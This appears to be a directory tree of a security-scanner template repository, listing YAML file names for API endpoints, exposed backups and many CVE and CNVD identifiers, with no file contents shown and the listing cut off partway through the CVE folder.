├── README.md
└── Templates
├── APIs
├── couchbase-buckets-api.yaml
├── fastAPI-1.yaml
├── fastAPI-2.yaml
├── fastAPI-3.yaml
├── fastAPI-4.yaml
├── fastAPI-5.yaml
├── graphql-1.yaml
├── graphql-10.yaml
├── graphql-11.yaml
├── graphql-12.yaml
├── graphql-13.yaml
├── graphql-14.yaml
├── graphql-15.yaml
├── graphql-16.yaml
├── graphql-17.yaml
├── graphql-18.yaml
├── graphql-19.yaml
├── graphql-2.yaml
├── graphql-20.yaml
├── graphql-21.yaml
├── graphql-22.yaml
├── graphql-23.yaml
├── graphql-24.yaml
├── graphql-25.yaml
├── graphql-26.yaml
├── graphql-27.yaml
├── graphql-28.yaml
├── graphql-29.yaml
├── graphql-3.yaml
├── graphql-30.yaml
├── graphql-31.yaml
├── graphql-32.yaml
├── graphql-33.yaml
├── graphql-34.yaml
├── graphql-35.yaml
├── graphql-36.yaml
├── graphql-37.yaml
├── graphql-38.yaml
├── graphql-39.yaml
├── graphql-4.yaml
├── graphql-40.yaml
├── graphql-41.yaml
├── graphql-42.yaml
├── graphql-43.yaml
├── graphql-44.yaml
├── graphql-45.yaml
├── graphql-46.yaml
├── graphql-47.yaml
├── graphql-48.yaml
├── graphql-49.yaml
├── graphql-5.yaml
├── graphql-50.yaml
├── graphql-51.yaml
├── graphql-52.yaml
├── graphql-53.yaml
├── graphql-54.yaml
├── graphql-55.yaml
├── graphql-56.yaml
├── graphql-57.yaml
├── graphql-58.yaml
├── graphql-59.yaml
├── graphql-6.yaml
├── graphql-7.yaml
├── graphql-8.yaml
├── graphql-9.yaml
├── openapi-1.yaml
├── openapi-2.yaml
├── strapi-page-1.yaml
├── strapi-page-2.yaml
├── swagger-api-1.yaml
├── swagger-api-10.yaml
├── swagger-api-11.yaml
├── swagger-api-12.yaml
├── swagger-api-13.yaml
├── swagger-api-14.yaml
├── swagger-api-15.yaml
├── swagger-api-16.yaml
├── swagger-api-17.yaml
├── swagger-api-18.yaml
├── swagger-api-19.yaml
├── swagger-api-2.yaml
├── swagger-api-20.yaml
├── swagger-api-21.yaml
├── swagger-api-22.yaml
├── swagger-api-23.yaml
├── swagger-api-24.yaml
├── swagger-api-25.yaml
├── swagger-api-26.yaml
├── swagger-api-27.yaml
├── swagger-api-28.yaml
├── swagger-api-29.yaml
├── swagger-api-3.yaml
├── swagger-api-30.yaml
├── swagger-api-31.yaml
├── swagger-api-32.yaml
├── swagger-api-33.yaml
├── swagger-api-34.yaml
├── swagger-api-35.yaml
├── swagger-api-36.yaml
├── swagger-api-37.yaml
├── swagger-api-38.yaml
├── swagger-api-39.yaml
├── swagger-api-4.yaml
├── swagger-api-40.yaml
├── swagger-api-41.yaml
├── swagger-api-42.yaml
├── swagger-api-43.yaml
├── swagger-api-44.yaml
├── swagger-api-45.yaml
├── swagger-api-46.yaml
├── swagger-api-47.yaml
├── swagger-api-48.yaml
├── swagger-api-49.yaml
├── swagger-api-5.yaml
├── swagger-api-50.yaml
├── swagger-api-51.yaml
├── swagger-api-52.yaml
├── swagger-api-53.yaml
├── swagger-api-54.yaml
├── swagger-api-55.yaml
├── swagger-api-56.yaml
├── swagger-api-57.yaml
├── swagger-api-58.yaml
├── swagger-api-59.yaml
├── swagger-api-6.yaml
├── swagger-api-60.yaml
├── swagger-api-61.yaml
├── swagger-api-62.yaml
├── swagger-api-63.yaml
├── swagger-api-64.yaml
├── swagger-api-65.yaml
├── swagger-api-66.yaml
├── swagger-api-67.yaml
├── swagger-api-68.yaml
├── swagger-api-69.yaml
├── swagger-api-7.yaml
├── swagger-api-70.yaml
├── swagger-api-71.yaml
├── swagger-api-72.yaml
├── swagger-api-8.yaml
├── swagger-api-9.yaml
├── wadl-api-1.yaml
├── wadl-api-2.yaml
├── wadl-api-3.yaml
├── wadl-api-4.yaml
├── wadl-api-5.yaml
├── wadl-api-6.yaml
├── wadl-api-7.yaml
└── wsdl-api.yaml
├── Backups
├── exposed-mysql-initial.yaml
├── php-backup-files-1.yaml
├── php-backup-files-10.yaml
├── php-backup-files-11.yaml
├── php-backup-files-12.yaml
├── php-backup-files-13.yaml
├── php-backup-files-14.yaml
├── php-backup-files-15.yaml
├── php-backup-files-2.yaml
├── php-backup-files-3.yaml
├── php-backup-files-4.yaml
├── php-backup-files-5.yaml
├── php-backup-files-6.yaml
├── php-backup-files-7.yaml
├── php-backup-files-8.yaml
├── php-backup-files-9.yaml
├── settings-php-files-1.yaml
├── settings-php-files-2.yaml
├── settings-php-files-3.yaml
├── settings-php-files-4.yaml
├── settings-php-files-5.yaml
├── settings-php-files-6.yaml
├── sql-dump-1.yaml
├── sql-dump-10.yaml
├── sql-dump-11.yaml
├── sql-dump-12.yaml
├── sql-dump-13.yaml
├── sql-dump-14.yaml
├── sql-dump-15.yaml
├── sql-dump-16.yaml
├── sql-dump-17.yaml
├── sql-dump-18.yaml
├── sql-dump-19.yaml
├── sql-dump-2.yaml
├── sql-dump-3.yaml
├── sql-dump-4.yaml
├── sql-dump-5.yaml
├── sql-dump-6.yaml
├── sql-dump-7.yaml
├── sql-dump-8.yaml
├── sql-dump-9.yaml
├── zip-backup-files-1.yaml
├── zip-backup-files-10.yaml
├── zip-backup-files-11.yaml
├── zip-backup-files-12.yaml
├── zip-backup-files-13.yaml
├── zip-backup-files-14.yaml
├── zip-backup-files-15.yaml
├── zip-backup-files-16.yaml
├── zip-backup-files-17.yaml
├── zip-backup-files-18.yaml
├── zip-backup-files-19.yaml
├── zip-backup-files-2.yaml
├── zip-backup-files-20.yaml
├── zip-backup-files-21.yaml
├── zip-backup-files-22.yaml
├── zip-backup-files-23.yaml
├── zip-backup-files-3.yaml
├── zip-backup-files-4.yaml
├── zip-backup-files-5.yaml
├── zip-backup-files-6.yaml
├── zip-backup-files-7.yaml
├── zip-backup-files-8.yaml
└── zip-backup-files-9.yaml
├── CVE
├── CNVD-2019-01348.yaml
├── CNVD-2019-06255.yaml
├── CNVD-2020-23735.yaml
├── CNVD-2020-56167.yaml
├── CNVD-2020-62422.yaml
├── CNVD-2021-10543.yaml
├── CNVD-2021-15822.yaml
├── CNVD-2021-17369.yaml
├── CNVD-2021-30167-1.yaml
├── CNVD-2021-30167-2.yaml
├── CVE-2005-2428.yaml
├── CVE-2005-4385.yaml
├── CVE-2006-1681.yaml
├── CVE-2007-0885.yaml
├── CVE-2007-4504.yaml
├── CVE-2007-4556.yaml
├── CVE-2008-2398.yaml
├── CVE-2008-2650.yaml
├── CVE-2008-4668.yaml
├── CVE-2008-4764.yaml
├── CVE-2008-6080.yaml
├── CVE-2008-6172.yaml
├── CVE-2008-6222.yaml
├── CVE-2008-6668-1.yaml
├── CVE-2008-6668-2.yaml
├── CVE-2009-0545.yaml
├── CVE-2009-0932.yaml
├── CVE-2009-1151.yaml
├── CVE-2009-1496.yaml
├── CVE-2009-1558.yaml
├── CVE-2009-1872.yaml
├── CVE-2009-2015.yaml
├── CVE-2009-2100.yaml
├── CVE-2009-3053.yaml
├── CVE-2009-3318.yaml
├── CVE-2009-4202.yaml
├── CVE-2009-4679.yaml
├── CVE-2009-5114.yaml
├── CVE-2010-0157.yaml
├── CVE-2010-0467.yaml
├── CVE-2010-0696.yaml
├── CVE-2010-0759.yaml
├── CVE-2010-0942.yaml
├── CVE-2010-0943.yaml
├── CVE-2010-0944.yaml
├── CVE-2010-0972.yaml
├── CVE-2010-0982.yaml
├── CVE-2010-0985.yaml
├── CVE-2010-1056.yaml
├── CVE-2010-1081.yaml
├── CVE-2010-1217.yaml
├── CVE-2010-1219.yaml
├── CVE-2010-1302.yaml
├── CVE-2010-1304.yaml
├── CVE-2010-1305.yaml
├── CVE-2010-1306.yaml
├── CVE-2010-1307.yaml
├── CVE-2010-1308.yaml
├── CVE-2010-1312.yaml
├── CVE-2010-1313.yaml
├── CVE-2010-1314.yaml
├── CVE-2010-1315.yaml
├── CVE-2010-1340.yaml
├── CVE-2010-1345.yaml
├── CVE-2010-1352.yaml
├── CVE-2010-1353.yaml
├── CVE-2010-1354.yaml
├── CVE-2010-1461.yaml
├── CVE-2010-1469.yaml
├── CVE-2010-1470.yaml
├── CVE-2010-1471.yaml
├── CVE-2010-1472.yaml
├── CVE-2010-1473.yaml
├── CVE-2010-1474.yaml
├── CVE-2010-1475.yaml
├── CVE-2010-1476.yaml
├── CVE-2010-1478.yaml
├── CVE-2010-1491.yaml
├── CVE-2010-1494.yaml
├── CVE-2010-1495.yaml
├── CVE-2010-1531.yaml
├── CVE-2010-1532.yaml
├── CVE-2010-1533.yaml
├── CVE-2010-1534.yaml
├── CVE-2010-1535.yaml
├── CVE-2010-1540.yaml
├── CVE-2010-1601.yaml
├── CVE-2010-1602.yaml
├── CVE-2010-1603.yaml
├── CVE-2010-1607.yaml
├── CVE-2010-1653.yaml
├── CVE-2010-1657.yaml
├── CVE-2010-1658.yaml
├── CVE-2010-1659.yaml
├── CVE-2010-1714.yaml
├── CVE-2010-1715.yaml
├── CVE-2010-1717.yaml
├── CVE-2010-1718.yaml
├── CVE-2010-1719.yaml
├── CVE-2010-1722.yaml
├── CVE-2010-1723.yaml
├── CVE-2010-1858.yaml
├── CVE-2010-1870-1.yaml
├── CVE-2010-1870-2.yaml
├── CVE-2010-1873.yaml
├── CVE-2010-1875.yaml
├── CVE-2010-1878.yaml
├── CVE-2010-1952.yaml
├── CVE-2010-1953.yaml
├── CVE-2010-1954.yaml
├── CVE-2010-1955.yaml
├── CVE-2010-1956.yaml
├── CVE-2010-1957.yaml
├── CVE-2010-1977.yaml
├── CVE-2010-1979.yaml
├── CVE-2010-1980.yaml
├── CVE-2010-1981.yaml
├── CVE-2010-1982.yaml
├── CVE-2010-1983.yaml
├── CVE-2010-2033.yaml
├── CVE-2010-2034.yaml
├── CVE-2010-2035.yaml
├── CVE-2010-2036.yaml
├── CVE-2010-2037.yaml
├── CVE-2010-2045.yaml
├── CVE-2010-2050.yaml
├── CVE-2010-2122.yaml
├── CVE-2010-2128.yaml
├── CVE-2010-2259.yaml
├── CVE-2010-2307.yaml
├── CVE-2010-2507.yaml
├── CVE-2010-2680.yaml
├── CVE-2010-2682.yaml
├── CVE-2010-2857.yaml
├── CVE-2010-2861.yaml
├── CVE-2010-2918.yaml
├── CVE-2010-2920.yaml
├── CVE-2010-3203.yaml
├── CVE-2010-3426.yaml
├── CVE-2010-4231.yaml
├── CVE-2010-4282.yaml
├── CVE-2010-4617.yaml
├── CVE-2010-4719.yaml
├── CVE-2010-4769.yaml
├── CVE-2010-4977.yaml
├── CVE-2010-5028.yaml
├── CVE-2010-5278.yaml
├── CVE-2010-5286.yaml
├── CVE-2011-0049.yaml
├── CVE-2011-1669.yaml
├── CVE-2011-2744.yaml
├── CVE-2011-2780.yaml
├── CVE-2011-3315.yaml
├── CVE-2011-4336.yaml
├── CVE-2011-4618.yaml
├── CVE-2011-4624.yaml
├── CVE-2011-4804.yaml
├── CVE-2011-4926.yaml
├── CVE-2011-5106.yaml
├── CVE-2011-5107.yaml
├── CVE-2011-5179.yaml
├── CVE-2011-5181.yaml
├── CVE-2011-5265.yaml
├── CVE-2012-0392.yaml
├── CVE-2012-0896.yaml
├── CVE-2012-0901.yaml
├── CVE-2012-0981.yaml
├── CVE-2012-0991.yaml
├── CVE-2012-0996.yaml
├── CVE-2012-1226.yaml
├── CVE-2012-1823.yaml
├── CVE-2012-1835.yaml
├── CVE-2012-2371.yaml
├── CVE-2012-4242.yaml
├── CVE-2012-4253.yaml
├── CVE-2012-4273.yaml
├── CVE-2012-4768.yaml
├── CVE-2012-4878.yaml
├── CVE-2012-4889.yaml
├── CVE-2012-5913.yaml
├── CVE-2013-1965.yaml
├── CVE-2013-2248.yaml
├── CVE-2013-2251-1.yaml
├── CVE-2013-2251-2.yaml
├── CVE-2013-2251-3.yaml
├── CVE-2013-2251-4.yaml
├── CVE-2013-2251-5.yaml
├── CVE-2013-2251-6.yaml
├── CVE-2013-2251-7.yaml
├── CVE-2013-2251-8.yaml
├── CVE-2013-2251-9.yaml
├── CVE-2013-2287.yaml
├── CVE-2013-3526.yaml
├── CVE-2013-3827-1.yaml
├── CVE-2013-3827-10.yaml
├── CVE-2013-3827-2.yaml
├── CVE-2013-3827-3.yaml
├── CVE-2013-3827-4.yaml
├── CVE-2013-3827-5.yaml
├── CVE-2013-3827-6.yaml
├── CVE-2013-3827-7.yaml
├── CVE-2013-3827-8.yaml
├── CVE-2013-3827-9.yaml
├── CVE-2013-4117.yaml
├── CVE-2013-4625.yaml
├── CVE-2013-5528.yaml
├── CVE-2013-5979.yaml
├── CVE-2013-7240.yaml
├── CVE-2014-10037.yaml
├── CVE-2014-2321.yaml
├── CVE-2014-2383-1.yaml
├── CVE-2014-2383-2.yaml
├── CVE-2014-2383-3.yaml
├── CVE-2014-2383-4.yaml
├── CVE-2014-2962.yaml
├── CVE-2014-3120.yaml
├── CVE-2014-3704.yaml
├── CVE-2014-3744.yaml
├── CVE-2014-4210.yaml
├── CVE-2014-4513.yaml
├── CVE-2014-4535.yaml
├── CVE-2014-4536.yaml
├── CVE-2014-4539.yaml
├── CVE-2014-4544.yaml
├── CVE-2014-4550.yaml
├── CVE-2014-4558.yaml
├── CVE-2014-4561.yaml
├── CVE-2014-4592.yaml
├── CVE-2014-4940.yaml
├── CVE-2014-5111.yaml
├── CVE-2014-5258.yaml
├── CVE-2014-5368.yaml
├── CVE-2014-6271-1.yaml
├── CVE-2014-6271-2.yaml
├── CVE-2014-6271-3.yaml
├── CVE-2014-6271-4.yaml
├── CVE-2014-6271-5.yaml
├── CVE-2014-6271-6.yaml
├── CVE-2014-6271-7.yaml
├── CVE-2014-6308.yaml
├── CVE-2014-8799.yaml
├── CVE-2014-9094.yaml
├── CVE-2014-9444.yaml
├── CVE-2015-1000012.yaml
├── CVE-2015-1427.yaml
├── CVE-2015-1880.yaml
├── CVE-2015-2067.yaml
├── CVE-2015-2068.yaml
├── CVE-2015-2080.yaml
├── CVE-2015-2807.yaml
├── CVE-2015-3337.yaml
├── CVE-2015-3648.yaml
├── CVE-2015-4050.yaml
├── CVE-2015-4414.yaml
├── CVE-2015-4632.yaml
├── CVE-2015-4694.yaml
├── CVE-2015-5461.yaml
├── CVE-2015-5471.yaml
├── CVE-2015-5688.yaml
├── CVE-2015-6477.yaml
├── CVE-2015-6544.yaml
├── CVE-2015-6920.yaml
├── CVE-2015-7297.yaml
├── CVE-2015-7377.yaml
├── CVE-2015-7780.yaml
├── CVE-2015-7823.yaml
├── CVE-2015-8349.yaml
├── CVE-2015-8399.yaml
├── CVE-2015-9414.yaml
├── CVE-2015-9480.yaml
├── CVE-2016-0957.yaml
├── CVE-2016-1000126.yaml
├── CVE-2016-1000127.yaml
├── CVE-2016-1000128.yaml
├── CVE-2016-1000129.yaml
├── CVE-2016-1000130.yaml
├── CVE-2016-1000131.yaml
├── CVE-2016-1000132.yaml
├── CVE-2016-1000133.yaml
├── CVE-2016-1000134.yaml
├── CVE-2016-1000135.yaml
├── CVE-2016-1000136.yaml
├── CVE-2016-1000137.yaml
├── CVE-2016-1000138.yaml
├── CVE-2016-1000139.yaml
├── CVE-2016-1000140.yaml
├── CVE-2016-1000141.yaml
├── CVE-2016-1000142.yaml
├── CVE-2016-1000143.yaml
├── CVE-2016-1000146.yaml
├── CVE-2016-1000148.yaml
├── CVE-2016-1000149.yaml
├── CVE-2016-1000152.yaml
├── CVE-2016-1000153.yaml
├── CVE-2016-1000154.yaml
├── CVE-2016-1000155.yaml
├── CVE-2016-10956-1.yaml
├── CVE-2016-10956-2.yaml
├── CVE-2016-10960.yaml
├── CVE-2016-10993.yaml
├── CVE-2016-2389.yaml
├── CVE-2016-3081.yaml
├── CVE-2016-4975.yaml
├── CVE-2016-5649.yaml
├── CVE-2016-6277.yaml
├── CVE-2016-7552.yaml
├── CVE-2016-7981.yaml
├── CVE-2016-8527.yaml
├── CVE-2017-1000028.yaml
├── CVE-2017-1000170.yaml
├── CVE-2017-1000486.yaml
├── CVE-2017-10075-1.yaml
├── CVE-2017-10075-2.yaml
├── CVE-2017-10271.yaml
├── CVE-2017-11444.yaml
├── CVE-2017-12149-2.yaml
├── CVE-2017-12149.yaml
├── CVE-2017-12542.yaml
├── CVE-2017-12544.yaml
├── CVE-2017-12611.yaml
├── CVE-2017-12615.yaml
├── CVE-2017-12635.yaml
├── CVE-2017-12637.yaml
├── CVE-2017-12794.yaml
├── CVE-2017-14535.yaml
├── CVE-2017-14537-1.yaml
├── CVE-2017-14537-2.yaml
├── CVE-2017-14651.yaml
├── CVE-2017-14849.yaml
├── CVE-2017-15647.yaml
├── CVE-2017-15715.yaml
├── CVE-2017-15944.yaml
├── CVE-2017-16806-1.yaml
├── CVE-2017-16806-2.yaml
├── CVE-2017-16877.yaml
├── CVE-2017-17043.yaml
├── CVE-2017-17059.yaml
├── CVE-2017-17451.yaml
├── CVE-2017-17562-1.yaml
├── CVE-2017-17562-10.yaml
├── CVE-2017-17562-11.yaml
├── CVE-2017-17562-12.yaml
├── CVE-2017-17562-13.yaml
├── CVE-2017-17562-14.yaml
├── CVE-2017-17562-15.yaml
├── CVE-2017-17562-16.yaml
├── CVE-2017-17562-17.yaml
├── CVE-2017-17562-18.yaml
├── CVE-2017-17562-19.yaml
├── CVE-2017-17562-2.yaml
├── CVE-2017-17562-20.yaml
├── CVE-2017-17562-21.yaml
├── CVE-2017-17562-22.yaml
├── CVE-2017-17562-23.yaml
├── CVE-2017-17562-24.yaml
├── CVE-2017-17562-25.yaml
├── CVE-2017-17562-26.yaml
├── CVE-2017-17562-27.yaml
├── CVE-2017-17562-28.yaml
├── CVE-2017-17562-29.yaml
├── CVE-2017-17562-3.yaml
├── CVE-2017-17562-30.yaml
├── CVE-2017-17562-31.yaml
├── CVE-2017-17562-32.yaml
├── CVE-2017-17562-33.yaml
├── CVE-2017-17562-34.yaml
├── CVE-2017-17562-35.yaml
├── CVE-2017-17562-36.yaml
├── CVE-2017-17562-37.yaml
├── CVE-2017-17562-38.yaml
├── CVE-2017-17562-39.yaml
├── CVE-2017-17562-4.yaml
├── CVE-2017-17562-40.yaml
├── CVE-2017-17562-41.yaml
├── CVE-2017-17562-42.yaml
├── CVE-2017-17562-43.yaml
├── CVE-2017-17562-44.yaml
├── CVE-2017-17562-45.yaml
├── CVE-2017-17562-46.yaml
├── CVE-2017-17562-47.yaml
├── CVE-2017-17562-48.yaml
├── CVE-2017-17562-49.yaml
├── CVE-2017-17562-5.yaml
├── CVE-2017-17562-50.yaml
├── CVE-2017-17562-51.yaml
├── CVE-2017-17562-52.yaml
├── CVE-2017-17562-53.yaml
├── CVE-2017-17562-54.yaml
├── CVE-2017-17562-55.yaml
├── CVE-2017-17562-56.yaml
├── CVE-2017-17562-57.yaml
├── CVE-2017-17562-58.yaml
├── CVE-2017-17562-59.yaml
├── CVE-2017-17562-6.yaml
├── CVE-2017-17562-60.yaml
├── CVE-2017-17562-61.yaml
├── CVE-2017-17562-62.yaml
├── CVE-2017-17562-63.yaml
├── CVE-2017-17562-64.yaml
├── CVE-2017-17562-7.yaml
├── CVE-2017-17562-8.yaml
├── CVE-2017-17562-9.yaml
├── CVE-2017-18024.yaml
├── CVE-2017-18536.yaml
├── CVE-2017-3528.yaml
├── CVE-2017-4011.yaml
├── CVE-2017-5487-1.yaml
├── CVE-2017-5487-2.yaml
├── CVE-2017-5521.yaml
├── CVE-2017-5638.yaml
├── CVE-2017-5982.yaml
├── CVE-2017-6090.yaml
├── CVE-2017-7269.yaml
├── CVE-2017-7391.yaml
├── CVE-2017-7615-1.yaml
├── CVE-2017-7615-2.yaml
├── CVE-2017-7615-3.yaml
├── CVE-2017-7615-4.yaml
├── CVE-2017-7615-5.yaml
├── CVE-2017-7921.yaml
├── CVE-2017-8917.yaml
├── CVE-2017-9140.yaml
├── CVE-2017-9288.yaml
├── CVE-2017-9791.yaml
├── CVE-2017-9805-2.yaml
├── CVE-2017-9805.yaml
├── CVE-2017-9822.yaml
├── CVE-2017-9841-1.yaml
├── CVE-2017-9841-10.yaml
├── CVE-2017-9841-11.yaml
├── CVE-2017-9841-12.yaml
├── CVE-2017-9841-2.yaml
├── CVE-2017-9841-3.yaml
├── CVE-2017-9841-4.yaml
├── CVE-2017-9841-5.yaml
├── CVE-2017-9841-6.yaml
├── CVE-2017-9841-7.yaml
├── CVE-2017-9841-8.yaml
├── CVE-2017-9841-9.yaml
├── CVE-2018-0127.yaml
├── CVE-2018-0296.yaml
├── CVE-2018-1000129-1.yaml
├── CVE-2018-1000129-2.yaml
├── CVE-2018-1000130.yaml
├── CVE-2018-1000861.yaml
├── CVE-2018-10093.yaml
├── CVE-2018-10095.yaml
├── CVE-2018-10141.yaml
├── CVE-2018-10822.yaml
├── CVE-2018-10823.yaml
├── CVE-2018-11409-1.yaml
├── CVE-2018-11409-2.yaml
├── CVE-2018-11709.yaml
├── CVE-2018-11759-1.yaml
├── CVE-2018-11759-2.yaml
├── CVE-2018-11776.yaml
├── CVE-2018-11784.yaml
├── CVE-2018-12031-1.yaml
├── CVE-2018-12031-2.yaml
├── CVE-2018-12054.yaml
├── CVE-2018-1207.yaml
├── CVE-2018-12095.yaml
├── CVE-2018-1247.yaml
├── CVE-2018-12613.yaml
├── CVE-2018-12634.yaml
├── CVE-2018-1271-1.yaml
├── CVE-2018-1271-2.yaml
├── CVE-2018-1273-1.yaml
├── CVE-2018-1273-2.yaml
├── CVE-2018-12998.yaml
├── CVE-2018-1335.yaml
├── CVE-2018-13379.yaml
├── CVE-2018-13380-1.yaml
├── CVE-2018-13380-2.yaml
├── CVE-2018-13980.yaml
├── CVE-2018-14013.yaml
├── CVE-2018-14064.yaml
├── CVE-2018-14574.yaml
├── CVE-2018-14728.yaml
├── CVE-2018-15535.yaml
├── CVE-2018-15745.yaml
├── CVE-2018-16059.yaml
├── CVE-2018-16283.yaml
├── CVE-2018-16288.yaml
├── CVE-2018-16299.yaml
├── CVE-2018-16341.yaml
├── CVE-2018-16668.yaml
├── CVE-2018-16670.yaml
├── CVE-2018-16671.yaml
├── CVE-2018-16763.yaml
├── CVE-2018-16836.yaml
├── CVE-2018-17246.yaml
├── CVE-2018-17254.yaml
├── CVE-2018-17431-1.yaml
├── CVE-2018-17431-2.yaml
├── CVE-2018-18069.yaml
├── CVE-2018-18570.yaml
├── CVE-2018-18775.yaml
├── CVE-2018-18777.yaml
├── CVE-2018-19386.yaml
├── CVE-2018-19439.yaml
├── CVE-2018-19458.yaml
├── CVE-2018-20462.yaml
├── CVE-2018-20470.yaml
├── CVE-2018-20824.yaml
├── CVE-2018-20985.yaml
├── CVE-2018-2392.yaml
├── CVE-2018-2791.yaml
├── CVE-2018-2894.yaml
├── CVE-2018-3167.yaml
├── CVE-2018-3238-1.yaml
├── CVE-2018-3238-2.yaml
├── CVE-2018-3238-3.yaml
├── CVE-2018-3714.yaml
├── CVE-2018-3760.yaml
├── CVE-2018-3810.yaml
├── CVE-2018-5230.yaml
├── CVE-2018-5233.yaml
├── CVE-2018-5316.yaml
├── CVE-2018-6008.yaml
├── CVE-2018-6910.yaml
├── CVE-2018-7251.yaml
├── CVE-2018-7422.yaml
├── CVE-2018-7490.yaml
├── CVE-2018-7600.yaml
├── CVE-2018-7700.yaml
├── CVE-2018-8006.yaml
├── CVE-2018-8033.yaml
├── CVE-2018-8715.yaml
├── CVE-2018-8719.yaml
├── CVE-2018-8770.yaml
├── CVE-2018-9118.yaml
├── CVE-2018-9205.yaml
├── CVE-2018-9845.yaml
├── CVE-2018-9995.yaml
├── CVE-2019-0221.yaml
├── CVE-2019-0230.yaml
├── CVE-2019-10068.yaml
├── CVE-2019-10092.yaml
├── CVE-2019-1010287.yaml
├── CVE-2019-10475.yaml
├── CVE-2019-11013.yaml
├── CVE-2019-11248.yaml
├── CVE-2019-11510.yaml
├── CVE-2019-11580.yaml
├── CVE-2019-11581.yaml
├── CVE-2019-11869-1.yaml
├── CVE-2019-12276.yaml
├── CVE-2019-12314.yaml
├── CVE-2019-12461.yaml
├── CVE-2019-12593-1.yaml
├── CVE-2019-12593-2.yaml
├── CVE-2019-12616.yaml
├── CVE-2019-12725.yaml
├── CVE-2019-13101.yaml
├── CVE-2019-13392.yaml
├── CVE-2019-13462.yaml
├── CVE-2019-14205.yaml
├── CVE-2019-14223.yaml
├── CVE-2019-14312.yaml
├── CVE-2019-14322-1.yaml
├── CVE-2019-14322-2.yaml
├── CVE-2019-14322-3.yaml
├── CVE-2019-14470.yaml
├── CVE-2019-14696.yaml
├── CVE-2019-14974.yaml
├── CVE-2019-15043.yaml
├── CVE-2019-15107.yaml
├── CVE-2019-15501.yaml
├── CVE-2019-15713.yaml
├── CVE-2019-15858.yaml
├── CVE-2019-15859.yaml
├── CVE-2019-15889.yaml
├── CVE-2019-16097.yaml
├── CVE-2019-16123.yaml
├── CVE-2019-16278.yaml
├── CVE-2019-16313.yaml
├── CVE-2019-16332.yaml
├── CVE-2019-16525.yaml
├── CVE-2019-1653.yaml
├── CVE-2019-16662.yaml
├── CVE-2019-16759.yaml
├── CVE-2019-16920-1.yaml
├── CVE-2019-16920-2.yaml
├── CVE-2019-17270.yaml
├── CVE-2019-17382-1.yaml
├── CVE-2019-17382-2.yaml
├── CVE-2019-17382-3.yaml
├── CVE-2019-17382-4.yaml
├── CVE-2019-17503-1.yaml
├── CVE-2019-17503-2.yaml
├── CVE-2019-17506.yaml
├── CVE-2019-17538.yaml
├── CVE-2019-18393.yaml
├── CVE-2019-18394.yaml
├── CVE-2019-18818.yaml
├── CVE-2019-19134.yaml
├── CVE-2019-19368.yaml
├── CVE-2019-19781.yaml
├── CVE-2019-19908.yaml
├── CVE-2019-19985.yaml
├── CVE-2019-20085.yaml
├── CVE-2019-20141-1.yaml
├── CVE-2019-20141-2.yaml
├── CVE-2019-20183.yaml
├── CVE-2019-2578-1.yaml
├── CVE-2019-2578-2.yaml
├── CVE-2019-2579.yaml
├── CVE-2019-2588.yaml
├── CVE-2019-2725.yaml
├── CVE-2019-2729.yaml
├── CVE-2019-3396.yaml
├── CVE-2019-3401.yaml
├── CVE-2019-3402.yaml
├── CVE-2019-3403.yaml
├── CVE-2019-3799.yaml
├── CVE-2019-5127-1.yaml
├── CVE-2019-5127-2.yaml
├── CVE-2019-5127-3.yaml
├── CVE-2019-5127.yaml
├── CVE-2019-5418.yaml
├── CVE-2019-6112.yaml
├── CVE-2019-6340.yaml
├── CVE-2019-6715.yaml
├── CVE-2019-7219.yaml
├── CVE-2019-7238.yaml
├── CVE-2019-7254-1.yaml
├── CVE-2019-7254-2.yaml
├── CVE-2019-7256.yaml
├── CVE-2019-7275.yaml
├── CVE-2019-7481.yaml
├── CVE-2019-7543-1.yaml
├── CVE-2019-7543-2.yaml
├── CVE-2019-7609.yaml
├── CVE-2019-8442.yaml
├── CVE-2019-8446.yaml
├── CVE-2019-8449.yaml
├── CVE-2019-8451.yaml
├── CVE-2019-8903.yaml
├── CVE-2019-8937.yaml
├── CVE-2019-8982.yaml
├── CVE-2019-9041.yaml
├── CVE-2019-9618.yaml
├── CVE-2019-9670.yaml
├── CVE-2019-9733.yaml
├── CVE-2019-9955.yaml
├── CVE-2020-0618.yaml
├── CVE-2020-10148.yaml
├── CVE-2020-10546.yaml
├── CVE-2020-10547.yaml
├── CVE-2020-10548.yaml
├── CVE-2020-10549.yaml
├── CVE-2020-11034-1.yaml
├── CVE-2020-11034-2.yaml
├── CVE-2020-11110.yaml
├── CVE-2020-11455.yaml
├── CVE-2020-11547-1.yaml
├── CVE-2020-11547-2.yaml
├── CVE-2020-11710.yaml
├── CVE-2020-11738-1.yaml
├── CVE-2020-11738-2.yaml
├── CVE-2020-11853.yaml
├── CVE-2020-11854.yaml
├── CVE-2020-11930.yaml
├── CVE-2020-11991.yaml
├── CVE-2020-12054.yaml
├── CVE-2020-12720.yaml
├── CVE-2020-12800.yaml
├── CVE-2020-13167-1.yaml
├── CVE-2020-13167-2.yaml
├── CVE-2020-13483.yaml
├── CVE-2020-13700.yaml
├── CVE-2020-13927.yaml
├── CVE-2020-13937.yaml
├── CVE-2020-13942.yaml
├── CVE-2020-14092.yaml
├── CVE-2020-14179.yaml
├── CVE-2020-14181.yaml
├── CVE-2020-14413.yaml
├── CVE-2020-14864.yaml
├── CVE-2020-14882-1.yaml
├── CVE-2020-14882-2.yaml
├── CVE-2020-14883.yaml
├── CVE-2020-15129.yaml
├── CVE-2020-15148.yaml
├── CVE-2020-15227.yaml
├── CVE-2020-15500.yaml
├── CVE-2020-15505.yaml
├── CVE-2020-15568-1.yaml
├── CVE-2020-15568-2.yaml
├── CVE-2020-15920.yaml
├── CVE-2020-16139.yaml
├── CVE-2020-16846.yaml
├── CVE-2020-16952.yaml
├── CVE-2020-17362.yaml
├── CVE-2020-17453.yaml
├── CVE-2020-17496.yaml
├── CVE-2020-17505.yaml
├── CVE-2020-17506.yaml
├── CVE-2020-17518.yaml
├── CVE-2020-17519.yaml
├── CVE-2020-17530.yaml
├── CVE-2020-19282.yaml
├── CVE-2020-19283.yaml
├── CVE-2020-19295.yaml
├── CVE-2020-1943.yaml
├── CVE-2020-19625.yaml
├── CVE-2020-2036-1.yaml
├── CVE-2020-2036-2.yaml
├── CVE-2020-2096.yaml
├── CVE-2020-21224.yaml
├── CVE-2020-2140-1.yaml
├── CVE-2020-2140-2.yaml
├── CVE-2020-22840.yaml
├── CVE-2020-23517.yaml
├── CVE-2020-23972-1.yaml
├── CVE-2020-23972-2.yaml
├── CVE-2020-24223.yaml
├── CVE-2020-24312.yaml
├── CVE-2020-24550.yaml
├── CVE-2020-24571.yaml
├── CVE-2020-24579.yaml
├── CVE-2020-24912-1.yaml
├── CVE-2020-24912-2.yaml
├── CVE-2020-24912-3.yaml
